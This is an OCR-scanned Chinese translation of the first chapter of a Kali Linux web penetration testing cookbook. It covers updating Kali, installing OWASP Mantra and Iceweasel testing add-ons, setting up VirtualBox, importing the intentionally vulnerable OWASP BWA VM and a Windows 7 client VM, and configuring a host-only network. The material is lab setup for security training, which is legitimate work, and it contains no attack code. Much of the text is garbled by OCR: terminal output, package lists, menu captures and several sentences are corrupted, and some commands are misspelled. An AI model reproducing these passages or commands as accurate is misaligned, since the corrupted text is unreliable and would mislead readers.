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在 第 一 章 中 ， 我 们 会 涉及 如 何 准备 我 们 的 Kali 以 便 能 够 遵循 这 本 书 中 的 秘籍 ， 并 使 用 虚拟 机 
建立 带 有 存在 漏洞 的 Web 应 用 的 实验 室 。 
1.1 升级 和 更 新 Kali 


在 我 们 开始 Web 应 用 安全 测试 之 前 ， 我 们 需要 确保 我 们 拥有 所 有 必要 的 最 新 工具 。 这 个 秘籍 
涉及 到 使 Kali 和 它 的 工具 保持 最 新 版 本 的 基本 步骤 。 


准备 


我 们 从 Kali 已 经 作为 主 操作 系统 安装 到 计算 机 上 ， 并 带 有 网 络 连接 来 开始 。 这 本 书 中 所 使 用 
的 版 本 为 2.0。 你 可 以 从 https://www.kali.org/downloads/ 下 载 live CD 和 安装 工具 。 


操作 步骤 
一 旦 你 的 Kali 实例 能 够 启动 和 运行 ， 执 行 下 列 步 骤 : 


1. X root 登录 Kali o RUZA x toor， 不 带 双 引号 。 你 也 可 以 使 用 su 来 切换 到 该 用 户 ， 
或 者 如 果 喜 欢 使 用 普通 用 户 而 不 是 root 的 话 ， 用 sudo 来 执行 单条 命令 。 


3. 运行 apt-get update 命令 。 这 会 下 载 可 用 于 安装 的 包 (应 用 和 工具 ) 的 更 新 列表 。 


apt-get update 


root(Dkali: ~ 


File Edit View Search Terminal Help 


root@kali: ~ apt-get update 
Get: //security paro kali/updates Release.gpg [819 B] 
‘TIPET: kali.c eleas: [819 BI] 


://http. zs 

//security Kali org cali/updates/main Sources 

.//http.kali.! «ali/main Sources [7,571 kB] 

j security .Kati or «alLi/updates/contrib Sources 

‘jhttp.kali. kaLi/non-free Sources [119 KEB] 

: l'/ecuritv.kati.org Kali/updates/non-Tree Sources 
.10 http://http.kali.org kali/contrib Sourcas [56.9 kB] 
39! QE LPS C EROE Ey ea arg Kali/updates/main amd54 Packages [347 
:12 http://http.kali.org kali/main amd64 Packages [8,475 kB] 
httpi//sscuritu. kali.org kali/updates/contrib Translation-en US 

http://hħhttp.kali.org kali/contrib Translatiorn-en US 
http://security.kali.org kali/updates/contrib Translation-en 
http://http.kali.org kali/contrib Translation-en 
http://security.kali.org kali/updates/main Translation-en US 
http://security.kali.org kali/updates/main Translation-en 
add Plaid kalia kali/main Translation-en US 
http://security.kali.org kali/updates/non-free Translation-en US 
http://http.kali.org kali/main Translation-en 
://Secüurity.kali.org TIE s/n n-free Translation-en 





一 旦 安装 完成 ， 执 行 下 列 命令 来 将 非 系 统 的 包 更 新 到 最 新 的 稳定 版 。 


apt-get upgrade 


root(mkali: * 


File Edt View Search Terminal Hels 

Reading package lists... Done 

rootgkali:-£* apt-get upgrade 

Reading package lists... Done 

Building dependency tree 

Heading state information... Done 

The following packages have been kept 
ailrcrack -nc gr rei aano ona 5 e scurit y-assistant openvas openvas-cli openvas-manager opaenvas-scannaer 
reaaver Wa 

The following i will be upgraded: 
arj automater burpsulte curl dnsmasq-base dpkg dpkg-dev exploitdb fern-wifl-cracker flle 
gnupg gpgv gstreamerBd.i8-plugins-bad hexinject ice I-b-]re-cacad icedtea-6-]re-jamwm Lcew 
avasnoop keimpx laudanum Libapache2-mod-phps libavcadec53 libavdeviceb3 libavformatb3 

avutilb5bl libcurl3 libcurl3-gnutls libdpkg-perl libfreetypes5 libfreetypeB5-dev Llibgcrypt]l 
2-xpm libgnutlsz6 libgstreamer-plugins-bad8.180-8 libicudB libldap-2.4-2 libmagic-dev 


Libmagicl Li ibmysqiclienti8 i libpostproc52 librubyl.B librubyl.3.1 libssl-dev libssl- 


libssll.8.80 libsvnl libswscale2 libtasnl-3 libxll-65 1 Libxll-data libxll-dev libxll-doc 
libxll-xcbl libxfontl libxml-libxml-perl libxml? libxmil2-dev libxml2-utlls libxrender-dev 
Llibxrenderl mercurial marcurial-common metasploit metasploit-common matasploit-framework 
mysql-client-5.5 mysqli-common mysql-server mysql -sarver- 2. Au duc s ehe ntp 


open]dk-5-]dk openjdk-56-jre openjdk-56-jre-headlaess openjdk-5-jre-lib openjdk-7-jdk openjdk-7-jre 


open]|dk-7-j1re-headless openssl phps phpb5-cli php5-common on mysql pipal ppr python Impacket 
python-Libxmlz2 python-magic recon-ng responder ruby-ethon ruby-ffTi ruby-typhoeus rubyl.8 
rubyl.B8-dev rubyl1.8.1 rubyl.9.1-dev set sqlmap subversion tcpdump wpscan zaproxy 

IB5 upgraded, 8 newly installed, B to remove and 9 not upgraded 

Need tà gel ids Mn of archives 

Attar this operation, 465.5 MB of additional disk spa 

Do you want ta contin Bf Ed 


当 被 询问 是 否 继 续 时 ， 按 下 v 并 按 下 回 车 。 





下 面 ， 让 我 们 升级 我 们 的 系统 。 键 入 下 列 命令 并 按 下 回 车 


apt-get dist-upgrade 


:=# apt-get dist-upgrade 
Reading package lists... Done 
EN dependency tree 
Heading state information... Done 
calculating upgrade... Done 
Th TOL UII packages will be REMOVED : 
ibo Ic 
Follow ia id WEW pat B, ages will he ins 5 talla d: 
-data LlibhiredisB.10 lib]: malloc] libopenv: B pixiewps python-markdown python-vulndb 
Ss-Servar 
pat cages will be upgraded: 
i oF -manager openvas-scan 
reāvār m LE amo onsole e 
9 upgraded, 8 newly ins alle , 1 to remove and OQ not upgraded. 
Need to get 298.2 MB ives, 
After this dua audor 7.996 BE of additional disk space will 
0 you want to continue [Y/n]? Y 
:1 http://http.kali.org/kali/ kali/main libhiredisG.18 amdé4 8.18.1-7 [23.7 kB] 
http://http.kali.org/kali/ kali/main greenbone-security-assistant amdo64 6.0. 





7. 现在 ， 我 们 更 新 了 Kali 并 准备 好 了 继续 。 


工作 原理 


这 个 秘籍 中 ， 我 们 涉及 到 了 更 新 基于 Debian 的 系统 (比如 Kali) 的 基本 步骤 。 首 先 

VÀ update 参数 调用 apt-get RT 的 仓库 中 ， 用 于 我 们 的 特定 系统 的 包 的 最 新 列 
表 。 下 载 和 安装 仓库 中 最 新 版 本 的 所 有 和 包 之 后 ，dist-update 参数 下 载 和 安装 upgrade 没有 安 
装 的 系统 包 (例如 内 核 和 内 核 模 块 ) 。 


> + dd 
Ug TN IN, 

SATT I 

"e , ' 
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UH "^ Aum 
[oo GATT 
~. $52 





有 一 些 工具 ， 例 如 Metasploit 框架 ， 拥 有 自己 的 更 新 命令 。 可 以 在 这 个 秘籍 之 后 执行 它们 。 
A-A 
命令 在 下 面 


msfupdate 


1.2 安装 和 运行 OWASP Mantra 


OWASP (开放 Web 应 用 安全 项 目 ，https://www.owasp.org/) 中 的 研究 员 已 经 将 Mozilla 
Flrefox 5 大 量 的 插件 集成 ， 这 些 插件 用 于 帮助 渗透 测 试 者 和 开发 者 测试 Web 应 用 的 bug 或 
安全 缺陷 。 这 个 秘籍 中 ， 我 们 会 在 Kali 上 安装 OWASP 

Mantra (http://www.getmantra.com/) ， 首 次 运行 它 ， 并 查看 一 些 特性 。 


大 多 数 Web 应 用 渗 踪 测试 都 通过 浏览 器 来 完成 。 这 就 是 我 们 为 什么 需要 一 个 带 有 一 组 工具 的 
浏览 器 来 执行 这 样 一 个 任务 。OWASP Mantra 包含 一 系列 插件 来 执行 任务 ， 例 如 : 


。 噢 探 和 拦截 HTTP 请 求 
e 调试 穴 户 端 代码 
e 查看 和 修改 Cookie 


e 收集 关于 站 点 和 应 用 的 信息 
准备 


幸运 的 是 ，OWASP Mantra 默认 包含 于 Kali 的 仓库 中 。 所 以 ， 要 确保 我 们 获得 了 浏览 器 的 最 
新 版 本 ， 我 们 需要 更 新 包 列 表 : 


apt-get update 


yo 
IRIE Sy R 
1， 打 开 终 端 并 执行 : 
apt-get install owasp-mantra-ff 


:= apt-get install owasp -mantra-tf 

Reading package lists... Done 
Building dependency tree 
Reading state information... Done 

following NEW packages will be installed: 

owasp-mantra-tff 

B upgraded, 1 newly installed, B to remove and © not upgraded. 
Need to get 58.80 MB of archives. 
After this operation, 126 MB of additional disk space will be used. 
Get:] http:iyvihttp.kali.org/katlir Kali/non-tree owasp-mantra-tf amdë4 0.9-1lkalil [60.0 MEB] 


Fetched 60.0 MB in 54s (1,106 kB/s] 


Unpacking owasp-mantra-Tf (from .../owasp-mantra-ff 80.9-Ikalil amd64.deb) 
Setting up owasp-mantra-ff (0.9-1kalil] 





2. 在 安装 完成 之 后 ， 访 问 菜 
pi Applications | 03 - Web Application Analysis | Web Vulnerability Scanners | owasp 
来 首次 启动 Mantra。 或 者 在 终端 中 输入 下 列 命令 : 


owasp-mantra-ff 


Applications * Places * 


ull IT T j 
SU UE dEEIFIS A Egi 


InF'erzmatien £sthering 
ale m er 


)2 - Vulnerability Analysis 
; grabbar 
- Web Application Analysis "à, dis 7h 
= CHS & Framework kentificatbian jboss-aut apwn-linux 
* Wab Ánplication Praxias 
$5 -autoapwn-win 
r Web Crawlers & irector Brutet 
t Web Vulnarabdity Scammers 
Dd - Database Azzazsmant 
Password Attac ha 
5 - Wireless Atbscke 
! -Reverze Engmnegnnag 


E» ph tation Tools 





3， 在 新 打开 的 浏览 器 中 ， 点 击 OWASP 图 标 之 后 点 击 Tools 。 这 里 我 们 可 以 访问 到 所 有 
OWASP Mantra 包含 的 工具 。 


Welcome to OWASP Mantra = Free and Open Source Browser based Security Framework = OWA! 


Welcome ta OWASP Mantr... X 





o um 


Bookmarks 


Preferences 


Ta wWw.getmantra.com/welcome E] i 





















* Managers 4 
History 
Privacy and Security + ul 
m Downloads 
| Debug Tools , 
baini Utilities : Preferences 
Help 
3 Information Gathering — * 
ua Editors } 
EE Network Utilities 
s 


Misc d 






Live HTTP headers Proxy d 





HttpFaox + 












HttpRequester Crrl Alt P 
Ref Control Options 

Default User Agent »1 
Web Developer 
Show/hide hackbar 


Ra, 2 Scanner 






NoRedirect 


Web Developer Extension 


Cookies Manager -- 





4. 我 们 会 在 之 后 的 章节 中 使 用 这 些 工 具 。 


Uncategorised d Edit This Menu 





h 














j 见 


你 可 能 也 对 Mantra on Chromium. (MOC) 感 兴 趣 ， 这 是 Mantra 的 一 个 替代 版 本 ， 基 于 
Chromium 浏览 器 。 当 前 ， 它 只 对 Windows 可 用 : http://www.getmantra.com/mantra-on- 
chromium.html ° 


eua 


1.3 配置 Iceweasel ï| 9, Z5 


如 果 我 们 不 喜欢 OWASP Mantra » RAT 44$ MA Firefox 的 最 新 版 本 ， 并 安装 我 们 自己 的 测 
试 相关 插 件 。Kali Linux 包含 了 Iceweasel * 5 —^- Firefox 的 变 体 。 我 们 这 里 会 使 用 它 来 看 
看 如 何在 它 上 面 安 装 我 们 的 测试 工具 


操作 步骤 


打开 Iceweasel 并 访问 Tools | Add-ons 。 就 像 下 面 的 截图 这 样 


Add-ons Manager 一 lceweasel 
Kali Linux, an Offensive n X | d Add-ons Manaqer x | 
$ kr mel aboutaddons +E H- Aft A ok 前 


S Most Viited Getting Started Plosense Security ^ & als Liras "& Kali Docs '"&Kali Tools HE xplait-L 
mw et 1008 + 


O vw B 
Hes Window Mew Priyate Save Page 
W'indes 
& Get Add-ons MESE 


Yeu dant haye am; add-ore af this typ - " 
& Oo ^o 
$ Extensions Leari mara abii add- ami Print History Eull Screen 
A Appearance p Ü 3 
Plugins Find Prafaerances k Add-ons 
J> Services P d 
Developar 


6) 5jnm to Syne 


Ed Customize F v 


2. 在 搜索 框 中 ， 输 入 tamper data 并 按 下 回 车 。 


Add-ons Manager = Iceweasel 上 | 
Kali Unuk; an Offense .. X. dÈ Add-ons Manager E 于 
$ Q icweasel about. addons vec B3 A Yr & +á = 


El Most Visited v | Getting Started llorrensive Security "Kali Linus Kali Docs "M Kali Tools KREsploit-D8 


| | tamperdata cO 





Mame Last Updated | | Best match 


21 Search search: i My Add-ons © Available Add-ans 


Tamper Data 11.0.1 D2/11/2010 


Š Get Add-ons 





Use tamperdata to ew and modity HTTPIHTTPS hoeders and past paramatara.. 


a 


3. 在 Tamper Data 插件 中 点 击 Install ° 

4. 对 话 框 会 弹出 ， 询 问 我 们 接受 EULA， 点 击 Accept and Install... ° 
可 能 需要 重启 你 的 浏览 器 来 完成 特定 插件 的 安装 。 

5. 下面， 我 们 在 搜索 框 中 搜索 cookies manager+ ° 

6. 在 cookies manager+ 插件 中 点 击 Install ° 

7. 现在 ， 搜 索 Firebug ° 

8. 搜索 和 安装 Hackbar 。 

9. 搜索 和 安装 HTTP Requester ° 


10. 搜索 和 安装 Passive Recon ? 


工作 原理 


目前 为 止 ， 我 们 在 Web 浏览 器 中 安装 了 一 些 工具 ， 但 是 对 Web 应 用 渗透 测试 者 来 说 ， 这 些 
工具 好 在 哪里 呢 ? 


e Cookies Manager+ : 这 个 插件 允许 我 们 查看 ， 并 有 时 候 修改 浏览 器 从 应 用 受到 的 Cookie 
的 值 E 

e Firebug : 这 是 任何 Web JF X Z8 35 X; se o A 32 XE] fie E NARAS o CLAE 
你 对 页 面 执行 一 些 客 户 端 修改 时 非常 有 用 。 


e Hackbar : 这 是 一 个 非常 简单 的 插件 ， 帮 助 我 们 尝试 不 同 的 输入 值 ， 而 不 需要 修改 或 重 
号 完整 的 URL。 在 手动 检查 跨 站 脚本 工具 和 执行 注入 的 时 候 ， 我 们 会 很 频繁 地 使 用 它 


e Http Requester : 使 用 这 个 工具 ， 我 们 就 能 构造 HTTP 链接 ， 包 括 GET ^ POST 和 PUT 
方法 ， 并 观察 来 自 服务 器 的 原始 响应 。 


e Passive Recon : 它 允 许 我 们 获得 关于 网 站 被 访问 的 公共 信息 ， 通 过 查询 DNS 记录 、 
WHOIS、 以 及 搜索 信息 ， 例 如 邮件 地 址 、 链 接 和 Google 中 的 合作 者 。 


e Tamper Data : 这 个 插件 能 够 在 请 求 由 浏览 器 发 送 之 后 ， 捕 获 任何 到 达 服 务 器 的 请 求 。 这 
提供 给 我 们 了 在 将 数据 引入 应 用 表单 之 后 ， 在 它 到 达 服 务 器 之 前 修改 它 的 机 会 。 

更 多 

有 一 些 插件 同样 对 Web 应 用 渗透 测试 者 有 用 ， 它 们 是 : 


e XSS Me 

e SQL Inject Me 
e FoxyProxy 

e iMacros 

e FirePHP 

e RESTClient 
e Wappalyzer 


1.4 € X VirtualBox 
这 是 我 们 的 第 四 篇 秘籍 ， 会 帮助 我 们 建立 虚拟 机 环境 ， 并 运行 它 来 实施 我 们 的 渗透 测试 。 我 


们 会 使 用 VirtualBox 在 这 样 的 环境 中 运行 主机 。 这 个 秘籍 中 ， 我 们 会 了 解 如 何 安 装 VirtualBox 
以 及 使 它 正常 工作 。 


准备 
在 我 们 在 Kali 中 安装 任何 东西 之 阐 ， 我 们 都 必须 确保 我 们 拥有 最 新 版 本 的 包 列 表 : 


apt-get update 


IRIE Y 3 
1， 我 们 首先 实际 安装 VirtualBox : 


apt-get install virtualbox 


Buil Hye g gapen ndar 1c | 
Reading state infor "mation. 
The following extra packages will be cieli 


dkms HgeeB 1 libvncserverG linux-header s-3.18.0-Kali3-amd6d 
Linux-headers-3.18. 8- -kali3-common linux be aders-amdoó4 linux-kbuild-3.18 
virtualbox-dkms virtualbox -qt 

Suggested packages: 
libvncserverG-dbg vde2 virtualbox-quest -additions 


Recommended pačckagēs: 
Linux -inage 

Ihe following NEW packages will 
dkms libgsoap4 libvncs: ) Linux- F -kali3-amd&e4 
linux-headers-3.1B.,G0-kali3-common Linux x-h eaders-aā ni Linux=kbuild-=3.18 
virtualbox WETERE BOX CRTE- paka -gt 

0 upgraded, 18 newly installed, O to remove and O not upgraded. 

Need to get 27.2 MB of chi EEF 

After this operation, 124 MB of additional disk space will be used. 


you want to continue [Y/n]? Y 





2. 安装 完成 之 后 ， 我 们 要 在 菜单 中 寻找 VirtualBox > i8 3:37 
l^] Applications | Usual applications | Accessories | VirtualBox ° 作为 替代 ， 我 们 也 可 
VA MJ. 2X Z 32 AA E 


virtualbox 





Oracle VH VirtualBox Manager 


File Machine Help 


ig | i3 Details 


Pew 
Welcome to Virtual Box! 


Tha laft part of this window is a List of all virtual machines on your computer Tha list is 

empty now because you haven't created amy virtual machines yet. i c di 

In ardar to create a new virtual machine, press the Mew button in A 

the maa tadi bar Located at the top of the window . ^» Jl 
区 

You can press the F1 key to gat instant help, nr visit 4 g 


vy. vir tualbaex org far the Latest informabion and news. 





现在 ， 我 们 运行 了 VirtualBox 并 且 已 经 准备 好 配置 虚拟 机 来 构建 我 们 上 自己 的 测试 环境 。 


工作 原理 


VirtualBox 允许 我 们 在 我 们 的 Kali 主 机 上 通过 虚拟 化 运行 多 个 主机 。 通 过 它 ， 我 们 可 以 使 用 
不 同 的 计算 机 和 操作 系统 来 挂 载 完 整 的 环境 。 并 同时 运行 它们 ， 只 要 Kali pedi 
处 理 能 力 允 许 。 


P 


虚拟 机 扩展 包 ， 提 供 了 VirtualBox 的 虚拟 机 附加 特性 ， 例 如 USB 2.0/3.0 x: dfe EE X d Jj 
能 。 它 可 以 从 https://www.virtualbox.org/wiki/Downloads 下 载 。 在 下 载 完成 后 双击 它 ， 
VirtualBox 会 做 剩余 的 事情 。 


j JL 


除 此 之 外 有 一 些 可 视 化 选项 。 如 果 你 使 用 过 程 中 感到 不 方便 ， 你 可 以 尝试 : 


e VMware Player/Workstation 
e Qemu 

e Xen 

e KVM 


1.5 创建 漏洞 虚拟 机 


现在 我 们 准备 好 创建 我 们 的 第 一 个 虚拟 机 ， 它 是 托管 Web 应 用 的 服务 器 ， 我 们 使 用 应 用 来 实 
$x 24€ JT 43411 83 29 3& 0| 3,43 77 o 


我 们 会 使 用 叫做 OWASP BWA ( Broken Web Apps) 的 虚拟 机 ， 它 是 存在 漏洞 的 Web 应 用 
的 集合 ， 特 别 为 执行 安全 测试 而 建立 。 


操作 步骤 


1. 访问 http://sourceforge.net/projects/owaspbwa/files/， 并 下 载 最 新 版 本 的 ,ova 文件 。 在 


本 书写 作 过 程 中 ， 它 是 OWASP_Broken Web Apps VM 1.1.1.0va ° 


国 Download OWASP Broken ... x al DVWA - Damn Vulnerable ... x 


€ ma~” |j|sourceforge.net/projects/owaspbwaj/files/1.1. 11DWASP Broken. Web. Apps VN Gi 


* sourceforge ee ics debe 


Bey 


You have chosen to open: 





U OWASP. Broken Web. Apps- VM. 1.1.1.ova 


E 
i] 


OWASP Broken W which is a: Open Virtualization Format Archive (1.8 GB) 
| from: http://hivelocity.dl.sourceforge.net 


Learn more: check out scre 


What should Mantra do with this file? 





O Open with VirtualBox (default) 
O DownThemALL! 


œ Save File 


(004 gj 5 6 AG 


Cancal 


等 待 下 载 完成 ， 之 后 打开 文件 : 


VirtualBox 的 导入 对 话 框 会 显示 。 如 果 你 打算 修改 机 器 名 称 或 描述 ， 你 可 以 通过 
完成 。 我 们 会 命名 为 vulnerable vm ， 并 且 使 剩余 选项 保持 默认 。 点 击 Import ° 


;ogie Ed " 
Em + 


Opening OWASP.Broken-Web-Apps-VM.1.1.1.ova 


OK 





双击 值 来 
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File Machine Help 


M 
r.i 
| 
|| 
=a 
[| 
1 
I 
| 


Import Virtual Appliance | 
Appliance settings ipshots 


These are the virtual machines contained in the appliance and the 
suggested settings of the imported VirtualBox machines. You can 
change many of the properties shown by double-clicking on the items 
and disable others using the check boxes below. 


&^ 











t 


Description Configuration 






| 





Virtual System 1 


vulnerable. vm 





Ə Description OWASP Broken Web Applicati.. | | 
Guest OS Type T Ubuntu (32 bit) | 
CPU 1 | 
ill RAM 1024 MB | 

|— (9 nyn F BE 























[| Reinitialize the MAC address of all network cards | 


Restore Defaults | Ba Import | | Cancel | 























IDE Secondary Master: | | | l 
Controller: SATA LY 


4， 导 入 需要 花费 一 分 钟 ， 之 后 我 们 会 看 到 我 们 的 虚拟 机 显示 在 VirtualBox 的 列表 中 。 让 我 
们 选中 它 并 点 击 Start 。 


M 


AX X239 15] 5 35e 98 RB * ARX root 作为 登录 名 ， owaspbwa 作为 
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p————————————————————————————————————MSSN T LL LLLI 


vulnerable-vm [Running] - Oracle VM VirtualBox 
Machine View Devices Help 


You can access the web apps at http:7710.0.2.157 


| 
You can administer ^ configure this machine through the console here, by S5Hing 
Ito io. 0.2 LL via Samba at 10.0.2.155, or via phpmyadmin at 

http: ET 0.2.15^phpnyadmin. 


In all these cases, you can use username "root" and password owaspbwa 


WASP Broken Web Applications UM Version 1.1.1 
Log in with username = root and password = aouwaspbua 


ouaspbua login: root 
Fassuord : 
You have new mail, 


Welcome to the UUASP Broken Web Apps URM 


ttt This UM has many serious security issues. We strongly recommend that you run 
it only on the "host only" or “NAT” network in the UM settings t1? 


You can access the web apps at http:^7/10.0.2.15^ 


tou can administer .^ configure this machine through the console here, by S5»5Hinmy 
10.0.2.15, via Sanba at 10.0.2.155, or via phpmyadmin at 
77 10.0.2. 157phpnyadmin. 


In all these cases, you can use username “root” and password "owaspbua" 





rootBowaspbwa: 8 


| eF O a (3 a Right Ctrl 


工作 原理 


ospiti dolia remi idee eh 
巧 ， 并 识别 和 利用 Web 应 用 中 的 漏洞 ， 以 便 帮 助 开发 者 和 管理 员 修复 和 防止 漏洞 。 


这 个 虚拟 机 包含 不 同类 型 的 Web 应用， 一 些 基 于 PHP， 一 些 基于 Java， 甚 至 还 有 一 些 基于 
NET 的 漏洞 应 用 。 也 有 一 些 已 知 应 用 的 漏洞 版 本 ， 例 如 WordPress 或 Joomla。 
j DL 


当 我 们 谈论 漏洞 应 用 和 虚拟 机 的 时 候 ， 有 很 多 选择 。 有 一 个 著名 网 站 含有 大 量 的 此 类 应 用 ， 
"5 x VulnHub ( https:// www.vulnhub.com/ ) n 它 也 有 一 些 思路 帮 助 你 解决 一 些 挑战 并 提 
2r 你 的 技能 o 


这 本 书 中 ， 我 们 会 为 一 些 秘 籍 使 用 另 一 个 虚拟 机 : bWapp Bee-box。 它 也 可 以 从 VulnHub 下 
载 : 


1.6 获取 客户 端 虚 拟 机 


JJ 


第 一 章 配置 Kali Linux 


当 我 们 执行 中 间 人 攻击 (MTM) 和 客户 端 攻击 时 ， 我 们 需要 另 一 台 上 庶 拟 机 来 向 已 经 建立 的 服 
务 器 发 送 请 求 。 这 个 秘籍 中 ， 我 们 会 下 载 Microsoft Windows 虚拟 机 并 导入 到 VirtualBox 
中 。 


TRE y HR 
1， 首 先 我们 需要 访问 下 载 站 点 «http://dev.modern.ie/tools/ vms/tdownloads»? ° 


2. 这 本 书 中 ， 我 们 会 在 Win? 虚拟 机 中 使 用 1E8。 


| E Vitus Macine (VM), Woa 1 


4 — B= 0 devmodarnia/tools/vris/tdownlaoads 








* 

pn Virtual Machine 

* | IEB on Win? a. M 
下 

b Select Platform 

， (en — — 1s] 
d 

m s 

" Your Virtual Machine 

© hs EXPIRE AFTER 90 DAYS 

e 

E When you Mrat install he Wh sela mapo vou cat rol hack 
Q to latet 


Download zip 


View mstallaton mstur trans 


alteh to multi-part dosrnlosad 





3. 文件 下 载 之 后 ， 我 们 需要 解压 它 。 访 问 它 下 载 的 位 置 。 
4.， 右 击 它 并 点 击 Extract Here (解压 到 此 处 ) o 


5， 解 压 完成 后 ， 打 开 .ova 文件 并 导入 到 VirtualBox 中 。 
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第 一 章 配置 Kali Linux 





Machine Help 


ts 


Appliance settings 








These are the virtual machines contained in the appliance and the 
suggested settings of the imported VirtualBox machines. You can 
change many of the properties shown by double-clicking on the items 


|. and disable others usina the check boxes below. 
Importing Appliance ..: Importing appliance '/root/Doev nloads/IEB — Win? ova 








—-— ë e Tu 


i RAM 512 MB 
(9 DVD ei 
i USR Controller MI 


| ; Reinitialize the MAC address of all network cards 


| Restore Defaults | Bac! mpari | Cancel... 














rry 





Contrnller: SATA 


6 现在 启动 新 的 虚拟 机 (名 为 IE8 - win7 ) ， 我 们 就 准备 好 客户 端 了 。 
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第 一 章 配置 Kali Linux 


IES - Win? [Running] - Oracle VM VirtualBox 





Machine View — Devices Help 


Host Name: IEEWTNT 

IE Version: B.0. T5601 1T514 i 

O5 Version: Windows 7 "" 
—— — — AM | httpi//modernlE 
"UTE T IEUser | 

Fassaad: Paszwürd! 


Snapshot/backup: 
Create a snapshot (or keep a backup af downloaded archive) before first booting and worlng with 
this vh, sa that yau can reset quickly ater Ehe OS trial expires. 


Licsensing notes and evaluation period: 
The modernie vetual machines use evaluation versions af Micrasaft wWindews, and are therefore time 
limited. ou can find a link to the full license an the desktop. 


Activation: 

Far Windaws 7, &, and 8.1 virtual machines, you need ta connect ta the Internet in order to actreate the 
trial. In mist cases, acteation will be done automatcally after a Few minutes. but you tan aka 
enter "simgr jato from an administrative command prompt. Thes ill gwe you 90 days. 

For Windows Vista, yau have 30 days after first boat. 

Far Windows XP, you have 30 days after First boot, You wil seg atpast notification pop up a few 
minutes after boot statim the days bett (n the system tray). 


Re-arm: 

i some cases [Wandtas AP, Vita, and T), & may be 站 可 SS 全 to Turihver eend tiè IL Er period it 
there are rearms left. The fallawing commands can be run from an administratroe command 
prompt [right-eliek on Command Prompt and select the Run ag Administrater option]. 

Shaw current license, time remaining, re-arm caunt [all except Windows «PiE 
img diy 

Re-arrn (all except Windows XP). Requires reboot. 
ting /rearrm 

BRe-arm (Windows XP only]. ote that na error ri gegen in the case na rearms are left, 


rundil32 exe syspetup, SetupOobeBnk 


For Windows 8 and 8.1, you wil MOT be able to re-arm the trial, 


mr 
5 "ESSE 


gi o2uw E T Right Ctrl 


"uer e 





工作 原理 


Microsoft 向 开发 者 提供 了 这 些 庶 拟 机 来 在 不 同 的 Windows 和 IE 版 本 上 测试 它们 的 应 用 ， 带 
有 30 天 的 免费 许可 ， 这 足以 用 于 实验 了 。 


作为 渗透 测试 者 ， 意 识 到 扣 depu deed es | 这 些 应 用 的 用 户 可 能 使 用 大 量 
的 不 同系 统 和 Web 浏览 器 来 和 互相 通信 非常 重要 。 知 道 了 这 个 之 后 ， 我 们 应 该 使 用 任何 客户 
端 / 服 务 器 的 设施 组 合 ， 为 成 功 的 渗透 测试 做 准备 。 


j JIL 


对 于 服务 端 和 客户 端的 虚拟 机 ， 如 果 你 在 使 用 已 经 构建 好 的 配置 时 感到 不 便 ， 你 总 是 可 以 构 
建 和 配置 你 自己 的 虚拟 机 。 这 里 是 一 些 关于 如 何 实现 的 信 
息 : https://www.virtualbox.org/manual/。 


1.7 为 正 第 通信 配置 虚拟 机 
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7J T 85654341159 EMAR 29-25 e EP 383848 ^ RAN ERTA RARA » 1e E EUR 8S 8] 
虚拟 机 放 到 局 域 网 中 可 能 存在 安全 风险 。 为 了 避免 它 ， 我 们 会 在 VirtualBox 中 做 一 个 特殊 的 
配置 ， 允 许 我 们 在 Kali 中 和 服务 器 及 客户 端 庶 拟 机 通信 ， 而 不 将 它们 暴露 给 网 络 。 


准备 


在 我 们 开始 之 前 ， 打 开 VirtualBox 并 且 宝 漏洞 服务 器 和 客户 端 庶 拟 机 都 关闭 了 。 


Te TE y 3 

1. 在 VirtualBox 中 访问 File | Preferences. | Network ° 
2. 选择 Host-only Networks 4&4 W ° 

3， 点 击 + 按钮 来 添加 新 网 络 。 


4， 新 的 网 络 ( vboxneto ) 会 创建 ， 它 的 详细 窗口 会 弹出 。 如 果 没 有 ， 选 项 网 络 并 点 击 编辑 
按钮 来 编辑 它 的 属性 。 


File Machine Hsin 


; $i. 
C T E General Network i Snapshots 


Mew Settings [8] Input 
























pp ps 


Ş i NAT Networks | Host- only Narworka 


-J| vm 
@ Power E Display i 
uel 


client.vr 





& p Network ll 
Powet Host- only Network Detalls 














= 
| | Adapter | DHCP Server 





一 


IlPwt Address: |192.168.56.1 








IPv4 Network Mask: |255.255.255.0 
IPvG Address: 


[Fw 而 Network Mask Length: lð 





Cancel OK 


Ld 


IDE SeconaaryTrmraster. [LOYO] Empty 


5， 在 对 话 框 中 ， 你 可 以 指定 网 络 配置 。 如 果 它 不 影响 你 的 本 地 网 络 配 置 ， 将 其 保留 默认 。 
你 也 可 以 修改 它 并 使 用 其 它 为 局 域 网 保留 的 网 段 中 的 地 址 ， 例 如 10.0.0.0/8 ` 
172.16.0.0/12 ` 192.168.0.0/16 » 


6. 合理 配置 之 后 ， 点 击 0k 。 


7， 下 一 步 是 配置 漏洞 虚拟 机 (vulnerable vm) 。 选 择 它 并 访问 它 的 设置 。 


第 一 章 配置 Kali Linux 


8. Š Network 并 且 在 Attached to: 下 拉 菜 单 中 ， 


O. 在 Name 中 ， 选 择 vboxneto ° 


10. 点 击 Ook ° 


选择 Host-only Adapter ° 


vulnerablo.. vm = Settings 


General 


Network 


System 


E 
国 
Display 
be 





Storage w| Enable Network Adapter 


Audio 


a Network 





| Mame: | vboxnetO 
© Serial Ports = | 


i$ usa 


E Shared Folders 





> Advanced 





Adapter 1 | Adapter 2 Adapter 3 Adapter 4- 


Attached to: | Host-only Adapter + | 














Help 


11. 在 客户 端 虚 拟 机 ( IE8 - win7 ) 中 执行 第 七 步 到 


12. 在 配置 完 两 个 虚拟 机 之 后 ， 让 我 们 测试 它们 是 否 


AJ 


Ho 


| Cancel || OK 


Tc 


能 卜 正 通信 。 启 动 两 个 虚拟 机 。 


13， 让 我 们 看 看 宿主 系统 的 网 络 通 信 : 打开 终端 并 输入 : 


ifconfig 


& x 


| 1 
i 
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root(Dkali: ~ 


File Edit View Search Terminal Tabs Help 


roet 人 kali | root(mpkali: - 
:=# ifconfig E 
Link encap:Ethernet  Hwaddr b8:ac:6f:ff:7c:67 
UP BROADCAST MULTICAST  MTU:15868 Metrics. 
RX packets:0 errors:0 nipa overruns:a frame:0 
TX packets:H arrörs:0 dropped: ovearruns:e | carriar:& 
ons:B txgueuelen: 1000 


(0.0 B) TX bytes:0 (0.0 B) 


Link encap:Local EBNBINIEN 
inat addr: ien. B.C 1 Mask : 755.0.0.0 
inet& addr: ::1/128 Scope:Host 


12 
UP LOOPBACK RUNNING MIU:525536  Metric:l 


RX packets:349 errors:O dropped:8 overruns:G frame:t 
IX packets:349 errors:@ dropped:8 overruns: carrier:6 
FOEL RTENE. 8 txqueuelen:G 

